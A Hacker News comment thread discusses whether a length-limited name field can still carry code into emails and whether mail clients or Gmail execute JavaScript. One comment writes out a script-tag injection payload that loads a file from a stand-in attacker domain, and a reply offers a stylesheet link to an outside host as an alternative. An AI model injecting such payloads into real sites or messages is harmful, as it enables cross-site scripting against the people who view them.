Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

>Although there was a length-restriction on the user's name

As long as any field allows enough chars to:

<script src="http://evilbadpersondomain.com/forTheLulz.js"></script>

....anything is possible from there.



There are email clients that execute JavaScript?


Ah, yeah smartphone and desktop apps don't do js(afaik) - but the web-browser access is still big. If gmail's web interface went down for a day, I think a lot of people would notice.


Gmail doesn't run JavaScript in e-mails, though.


I am not sure - when you post enough js-code into a gmail compose "window" it will crash.


My guess: the WYSIWYG editor uses its own HTML parser and filter, written in JavaScript, that has some O(n^terrible) corner case that your paste test is hitting.


I don't know of any email clients that execute JS inside mails. I don't think we will see such clients anytime soon.


Make that `<link rel=stylesheet href=http://ø.xx>` as JavaScript won't execute in recent mail clients.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: